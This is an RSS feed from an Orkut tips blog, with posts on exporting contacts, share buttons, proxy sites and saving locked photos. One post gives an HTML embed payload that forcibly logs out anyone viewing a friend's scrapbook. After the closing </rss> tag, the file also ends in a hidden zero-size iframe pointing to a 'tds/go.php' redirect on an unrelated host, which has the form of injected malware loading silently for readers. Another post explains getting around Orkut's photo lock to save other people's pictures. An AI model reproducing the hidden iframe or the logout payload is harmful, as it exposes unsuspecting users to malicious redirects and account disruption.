<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Scrapia &#187; tricks</title>
	<atom:link href="http://www.scrapia.com/category/tricks/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.scrapia.com</link>
	<description>Orkut Scraps, Tips &#38; Tricks</description>
	<lastBuildDate>Wed, 28 Jul 2010 14:44:46 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Find Email Address Of Orkut Friends</title>
		<link>http://www.scrapia.com/find-email-address-of-orkut-friends/</link>
		<comments>http://www.scrapia.com/find-email-address-of-orkut-friends/#comments</comments>
		<pubDate>Mon, 14 Jun 2010 14:52:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[address]]></category>
		<category><![CDATA[contact]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[find]]></category>
		<category><![CDATA[friends]]></category>
		<category><![CDATA[orkut contacts]]></category>
		<category><![CDATA[orkut friends]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[orkut tricks]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=178</guid>
		<description><![CDATA[Orkut has no such options which allow you to see any of yours friends email address in there profile as well as in yours friends contact list due to some privacy policy, so it creates problem for a new orkut user to see the email address of his friends in orkut .But now we are [...]]]></description>
			<content:encoded><![CDATA[<p>Orkut has no such options which allow you to see any of yours friends email address in there profile as well as in yours friends contact list due to some privacy policy, so it creates problem for a new orkut user to see the email address of his friends in orkut .But now we are able to retrieve all ours friends email address simply by following few steps mention as under :-</p>
<p>1. <strong>Retrieve orkut email address</strong> of your friends by navigating to Show Friend page by clicking Friends Link which is at the top of the page.</p>
<p>2. At the rightside of that page, which is just below Manage Contacts click Export Contacts  which enables you to download all yours friends email address in .csv format  directly to your computer.</p>
<p>3 .This Process enables you view all your friends details on your Desktop with excel.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Ffind-email-address-of-orkut-friends%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/find-email-address-of-orkut-friends/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How to add orkut share button in blogs</title>
		<link>http://www.scrapia.com/how-to-add-orkut-share-button-in-blogs/</link>
		<comments>http://www.scrapia.com/how-to-add-orkut-share-button-in-blogs/#comments</comments>
		<pubDate>Sat, 22 May 2010 12:47:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[API]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[blogspot]]></category>
		<category><![CDATA[button]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut API]]></category>
		<category><![CDATA[orkut post]]></category>
		<category><![CDATA[orkut scraps]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[orkut user]]></category>
		<category><![CDATA[share]]></category>
		<category><![CDATA[share button]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=159</guid>
		<description><![CDATA[Learn How to add Orkut Post Share Button in WordPress Blog There will be a header.php file in your wordpress theme&#8217;s folder and you need to paste the following code above &#60;/head&#62; tag &#60;script type=&#8221;text/javascript&#8221; src=&#8221;http://www.google.com/jsapi&#8221;&#62;&#60;/script&#62; &#60;script type=&#8221;text/javascript&#8221;&#62; google.load(&#8216;orkut.share&#8217;, &#8217;1&#8242;); google.setOnLoadCallback(function() { var params = {}; params[google.orkut.share.Field.TITLE] = &#8216;&#60;?php the_title() ?&#62;&#8217;; params[google.orkut.share.Field.DESTINATION_URL] = &#8216;&#60;?php the_permalink() [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Learn How to add Orkut Post Share Button in WordPress Blog</strong></p>
<p>There will be a header.php file in your wordpress theme&#8217;s folder and  you need to paste the following code above &lt;/head&gt; tag</p>
<p>&lt;script type=&#8221;text/javascript&#8221;  src=&#8221;http://www.google.com/jsapi&#8221;&gt;&lt;/script&gt;<br />
&lt;script type=&#8221;text/javascript&#8221;&gt;<br />
google.load(&#8216;orkut.share&#8217;, &#8217;1&#8242;);<br />
google.setOnLoadCallback(function() {<br />
var params = {};<br />
params[google.orkut.share.Field.TITLE] = &#8216;&lt;?php the_title()  ?&gt;&#8217;;<br />
params[google.orkut.share.Field.DESTINATION_URL] = &#8216;&lt;?php  the_permalink() ?&gt;&#8217;;<br />
var connection = new google.orkut.share.Connection(params);<br />
document.getElementById(&#8216;orkut-share&#8217;).onclick =<br />
function(e) { connection.send(&#8216;orkut.com&#8217;, {}); };<br />
}, true);<br />
&lt;/script&gt;</p>
<p>Now save the header.php file and go to Single.php file or wherever you  want to put this button and paste the following code there.</p>
<p>&lt;span id=&#8221;orkut-share&#8221; style=&#8221;cursor:pointer; border:0px solid  black&#8221;&gt;<br />
&lt;img  src=&#8221;http://3.bp.blogspot.com/_eEuHGVw5WLg/SwpFfy4rMqI/AAAAAAAAAAk/jdm-zBiDdv8/s320/share.gif&#8221;  alt=&#8221;Share Orkut&#8221; /&gt;<br />
&lt;/span&gt;</p>
<p>Save the file and you are ready for using the Share Button feature of  ORKUT API.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fhow-to-add-orkut-share-button-in-blogs%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/how-to-add-orkut-share-button-in-blogs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Find Online Orkut Friends &#8211; Learn how to find Who Is Online on your Orkut Friends List</title>
		<link>http://www.scrapia.com/find-online-orkut-friends-learn-how-to-find-who-is-online-on-your-orkut-friends-list/</link>
		<comments>http://www.scrapia.com/find-online-orkut-friends-learn-how-to-find-who-is-online-on-your-orkut-friends-list/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 18:57:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[chat]]></category>
		<category><![CDATA[friend list]]></category>
		<category><![CDATA[friends]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[scrap]]></category>
		<category><![CDATA[scrapping]]></category>
		<category><![CDATA[scraps]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=157</guid>
		<description><![CDATA[Learn to find online orkut friends. In Orkut  there is no option that shows if the users is online or not. So, practically this is impossible to find online friends accurately. Still, we can try to do it and remember, this is like a wild guess, though 90% correct most of the times. Most of [...]]]></description>
			<content:encoded><![CDATA[<p>Learn to find <strong>online  orkut friends</strong>. In Orkut  there is no option that shows if the users is online or not. So, practically this is impossible to find online friends accurately. Still, we  can try to do it and remember, this is like a wild guess, though 90% correct  most of the times.</p>
<p> Most of people use Orkut for  scrapping feature. But sometimes, we don&#8217;t get replies from our friends.  At those times we wonder whether they are online or offline.  It makes a curiosity to know if that friend is online but not scrapping  just to avoid.</p>
<p> Just to check if someone is online on orkut or not, open your homepage and look at your <strong>orkut friends list.</strong> It&#8217;s in the top right  side corner. You will see few (8) of your friend&#8217;s pic over there.</p>
<p>The first row displays 4 friends. And just get sure that those four  friends are online. Orkut always  displays recently logged members in the top row. So, almost get sure  that those four friends are online. And the next four friends in the  below line, well there is a 50-50 chance, which depends on the number of  friends you have. If you have more than 50 friends, then there is a  bright chance that the second row friends are online, but if you have  less than 50 orkut friends, you  can not comment on his online presence.</p>
<p>Try it out ! <img src='http://www.scrapia.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Ffind-online-orkut-friends-learn-how-to-find-who-is-online-on-your-orkut-friends-list%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/find-online-orkut-friends-learn-how-to-find-who-is-online-on-your-orkut-friends-list/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tricks to Save Locked Orkut Album Photos on Your Computer</title>
		<link>http://www.scrapia.com/tricks-save-locked-orkut-album-photos-computer/</link>
		<comments>http://www.scrapia.com/tricks-save-locked-orkut-album-photos-computer/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 13:11:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[bypass orkut]]></category>
		<category><![CDATA[locked]]></category>
		<category><![CDATA[Orkut album photos]]></category>
		<category><![CDATA[photo album]]></category>
		<category><![CDATA[pictures]]></category>
		<category><![CDATA[right click]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=135</guid>
		<description><![CDATA[Before couple of months, Orkut enhanced it’s security features and locked all user’s album pictures so that no one can save those photos on their computers. Orkut took this step to protect it’s user’s privacy by disabling right mouse click button on Orkut album photos. Your right mouse button won’t work in those pages that [...]]]></description>
			<content:encoded><![CDATA[<p>Before couple of months, Orkut enhanced it’s security features and locked all user’s album pictures so that no one can save those photos on their computers. Orkut took this step to protect it’s user’s privacy by <strong>disabling right mouse click button on Orkut album photos</strong>. Your right mouse button won’t work in those pages that we normally use to save photos. But here is the trick to bypass the right click disable protection and <strong>save anyone’s locked photo from his Orkut album</strong>.</p>
<p>There are many ways to do this trick, may be more than twenty. Yes, I’m not kidding! There are several ways to break Orkut security and save album images. I will update all those tricks in one single post once I get ample time in hand. But for now let’s discuss 2 easy steps to save anyone’s locked photo from his Orkut album. Let’s start one by one.</p>
<h3>Save Orkut Album Photo by Dragging it to Address Bar</h3>
<ol>
<li>Navigate to the album photo that you want to save.</li>
<li>Left click on the photo and then drag it to the address bar (where you type www.orkut.com)</li>
<li>Once you drop that image there, it will open with a new page with that image.</li>
<li>Right click on that image and save on your computer (yes, right click will work here).</li>
<li>You are done.</li>
</ol>
<h3>Save Photo from Orkut Albums using Keyboard and MS Paint</h3>
<ol>
<li>Open any Orkut album photo on your browser.</li>
<li>Hit Print Screen button on your keyboard to capture your screen</li>
<li>Navigate to <strong>Start</strong> &gt;&gt; <strong>All Programs</strong> &gt;&gt; <strong>Accessories</strong> and open <strong>Paint</strong></li>
<li>Press <strong>Ctrl</strong>+<strong>V</strong> to get the image on MS paint window</li>
<li>Edit the image to corp it and save on your computer.</li>
<li>You are done.</li>
</ol>
<p>That’s it. Now you can save anyone’s orkut album photos,  <strong>bypassing Orkut security lock feature</strong>.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Ftricks-save-locked-orkut-album-photos-computer%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/tricks-save-locked-orkut-album-photos-computer/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Orkut Best Or Worst Profile Prank Trick</title>
		<link>http://www.scrapia.com/orkut-worst-profile-prank-trick/</link>
		<comments>http://www.scrapia.com/orkut-worst-profile-prank-trick/#comments</comments>
		<pubDate>Fri, 16 Oct 2009 13:03:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[profile]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=130</guid>
		<description><![CDATA[This trick is performed by just using an Orkut profile link. This link will direct to the person’s profile clicking on it. So, provide this link to all your friends and play this Orkut prank with your pals. You can either say this is the worst profile link of Orkut and whenever he clicks on [...]]]></description>
			<content:encoded><![CDATA[<p>This trick is performed by just using an Orkut profile link. This link will direct to the person’s profile clicking on it. So, provide this link to all your friends and play this Orkut prank with your pals. You can either say this is the worst profile link of Orkut and whenever he clicks on it, he will be redirected to his own profile. Now if you click on that link, you will get redirected to your own profile. This means whoever clicks the link will land on his own orkut profile page.</p>
<p><!--adsense#link--><a title="Orkut Best or Worst Profile Prank Trick" href="http://www.orkut.com/Profile.aspx?2uid=6849219260034274333%20/">http://www.orkut.com/Profile.aspx?2uid=6849219260034274333%20/</a></p>
<p><!--adsense-->Pass the above link to anyone saying that it’s the profile of Orkut’s worst user <a id="KonaLink0" style="text-decoration: underline ! important; position: static;" href="http://www.darkorkut.com/orkut-best-or-worst-profile-prank-trick/#" target="undefined"><span style="color: blue ! important; font-weight: 400; font-size: 13px; position: static;"></span></a>or Orkut’s best user. You may also want to keep this in your profile’s About Me filed. Amaze and surprise your friends with this cool Orkut trick.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Forkut-worst-profile-prank-trick%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/orkut-worst-profile-prank-trick/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Force Logout your Friend</title>
		<link>http://www.scrapia.com/force-logout-friend/</link>
		<comments>http://www.scrapia.com/force-logout-friend/#comments</comments>
		<pubDate>Mon, 05 Oct 2009 12:34:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[force logout]]></category>
		<category><![CDATA[logout]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut script]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=121</guid>
		<description><![CDATA[Just paste this code to your friend&#8217;s scrapbook and he will be logged off as soon as he (or anyone else) visits his scrapbook. After you have used this code on your friend&#8217;s scrapbook, he will be able to use his scrapbook after he gets atleast ten more scraps. WARNING : Posting the code in [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-family: Verdana; font-size: x-small;">Just paste this code to your friend&#8217;s scrapbook and he will be logged off as soon as he (or anyone else) visits his scrapbook.</span></p>
<p>After you have used this code on your friend&#8217;s scrapbook, he will be able to use his scrapbook after he gets atleast ten more scraps.</p>
<p><span style="color: red;"><strong>WARNING </strong></span>: Posting the code in your scrapbook may lock your scrapbook for you as well.</p>
<p>Follow the steps:</p>
<p>1) Open your friend&#8217;s scrapbook.</p>
<p>2) Copy the following code and paste it in his scrapbook.</p>
<p>Html Code
<pre>
<textarea onmouseover="this.focus()" cols="20" rows="2">&lt;embed src="http://www.orkut.com/GLogin.aspx?cmd=logout" width="1" height="1"&gt;</textarea></pre>
<p>4) Submit the scrap.</p>
<p>That&#8217;s all.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fforce-logout-friend%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/force-logout-friend/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Post Blank Scraps</title>
		<link>http://www.scrapia.com/post-blank-scraps/</link>
		<comments>http://www.scrapia.com/post-blank-scraps/#comments</comments>
		<pubDate>Sat, 03 Oct 2009 12:31:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[blank]]></category>
		<category><![CDATA[blank scrap]]></category>
		<category><![CDATA[blank scraps]]></category>
		<category><![CDATA[invisible]]></category>
		<category><![CDATA[invisible scrap]]></category>
		<category><![CDATA[invisible scraps]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut friends]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=118</guid>
		<description><![CDATA[What to know how to send blank scraps by writing a blank scrap or a blank post in a community. For writing blank scrap, follow the steps: 1) Open any scrapbook. 2) Write [i] in the scrapbook. (you can also use [b] &#38; [u] ) 3) Do NOT write anything else in the scrapbook, and [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-family: Verdana; font-size: x-small;">What to know how to send <strong>blank scraps</strong> by writing a blank scrap or a blank post in a community.</span></p>
<p><span style="font-family: Verdana; font-size: x-small;">For writing blank scrap, follow the steps:</p>
<p>1) Open any scrapbook.</p>
<p>2) Write [i] in the scrapbook. <em>(you can also use [b] &amp; [u] )</em></span></p>
<p><span style="font-family: Verdana; font-size: x-small;">3) Do NOT write anything else in the scrapbook, and submit the scrap.</p>
<p>That&#8217;s all. </span></p>
<p><span style="font-family: Verdana; font-size: x-small;">Now go and impress your friends by sending invisible scraps in orkut.<br />
</span></p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fpost-blank-scraps%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/post-blank-scraps/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Remove Orkut Ads</title>
		<link>http://www.scrapia.com/remove-orkut-ads/</link>
		<comments>http://www.scrapia.com/remove-orkut-ads/#comments</comments>
		<pubDate>Sun, 31 May 2009 17:52:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[ads]]></category>
		<category><![CDATA[advertisment]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[scripts]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=91</guid>
		<description><![CDATA[Some of you might be annoyed by the advertisement display on orkut. If you hate those ads you can now completely disable/remove orkut advertisements using a small greasemonkey script. Completely Remove Orkut Ads Make sure you have Firefox and Greasemonkey Installed. Install Remove Orkut Ads Completely Done! The script should perfectly do it’s job. You [...]]]></description>
			<content:encoded><![CDATA[<p>Some of you might be annoyed by the advertisement display on orkut. If you hate those ads you can now completely <b>disable/remove orkut advertisements</b> using a small greasemonkey script.</p>
<div class="loltitleclassic"><b>Completely Remove Orkut Ads</b></div>
<ul>
<li>Make sure you have <a href="http://getfirefox.com/" mce_href="http://getfirefox.com/">Firefox</a> and Greasemonkey Installed.</li>
<li><a href="http://cdn.orkutplus.net/files/userscripts/removeadsfromorkutpages.user.js" mce_href="http://cdn.orkutplus.net/files/userscripts/removeadsfromorkutpages.user.js">Install Remove Orkut Ads Completely</a></li>
</ul>
<p>Done! The script should perfectly do it’s job. You wont see an ad again on Orkut.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fremove-orkut-ads%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/remove-orkut-ads/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Proxy Site for Orkut</title>
		<link>http://www.scrapia.com/proxy-site-orkut/</link>
		<comments>http://www.scrapia.com/proxy-site-orkut/#comments</comments>
		<pubDate>Tue, 12 May 2009 05:57:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[bypass orkut]]></category>
		<category><![CDATA[free proxy]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut proxy list]]></category>
		<category><![CDATA[proxies]]></category>
		<category><![CDATA[proxies list]]></category>
		<category><![CDATA[proxy]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=86</guid>
		<description><![CDATA[At any point of time there is always a demand for free orkut proxy website among employees and college goers. To fulfil the same demand of proxy sites, we present a list of working proxies. The free proxy list shown here are some of the New free and fastest orkut proxies list. http://orkutoxy.com/ http://www.proxut.com/ http://orkja.com/]]></description>
			<content:encoded><![CDATA[<p>At any point of time there is always a demand for <strong>free orkut proxy website</strong> among employees and college goers. To fulfil the same demand of <strong>proxy sites</strong>, we present a list of <strong>working proxies</strong>. The <strong>free proxy list</strong> shown here are some of the New free and fastest <strong><strong>orkut proxies</strong> list</strong>.</p>
<p><a href="http://orkutoxy.com/">http://orkutoxy.com/</a></p>
<p><a href="http://www.proxut.com/">http://www.proxut.com/</a></p>
<p><a href="http://orkja.com/">http://orkja.com/</a></p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fproxy-site-orkut%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/proxy-site-orkut/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Disable Google Talk Popup Chat Windows in Orkut</title>
		<link>http://www.scrapia.com/disable-google-talk-popup-chat-windows-orkut/</link>
		<comments>http://www.scrapia.com/disable-google-talk-popup-chat-windows-orkut/#comments</comments>
		<pubDate>Sun, 12 Apr 2009 06:29:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[gtalk]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[orkut tricks]]></category>
		<category><![CDATA[scraps]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=64</guid>
		<description><![CDATA[Sometime back Orkut added complete support for Google-Talk popup chat windows. This is different than earlier GoogleTalk integration where your Orkut friends gets added to Google Talk chat list automatically. This recent integration opens all active Google Talk chat windows when you move from one Orkut window to another Orkut window seamlessly. This integration also [...]]]></description>
			<content:encoded><![CDATA[<p>Sometime back Orkut added complete support for Google-Talk popup chat windows. This is different than earlier GoogleTalk integration where your Orkut friends gets added to Google Talk chat list automatically.</p>
<p>This recent integration opens all active Google Talk chat windows when you move from one Orkut window to another Orkut window seamlessly. This integration also works while switching between Gmail and Orkut.</p>
<p>I personally find this very annoying as I keep open Gmail all the time and prefer to use Gmail chat version of Google Talk. Everytime I open an Orkut page, I have to close these annoying popup chat windows. So I wanted a way out where I can disable these popup chat windows and still have my all Orkut friends get added to Google Talk friend-list automatically.</p>
<p>Solution:</p>
<p>Disabling these popup chats on Orkut is just a click away.</p>
<p>Simply set your Google Talk status on Orkut as offline. This will not affect your status on Gmail and elsewhere.</p>
<p>Screenshot:</p>
<p><strong></strong></p>
<p><strong><img src="http://www.orkutdiary.com/blog/wp-content/uploads/2009/04/orkut-disable-google-talk-popup-2.png" alt="Orkut - Disable Google Talk Popup Chat" width="480" height="204" /></strong></p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fdisable-google-talk-popup-chat-windows-orkut%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/disable-google-talk-popup-chat-windows-orkut/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
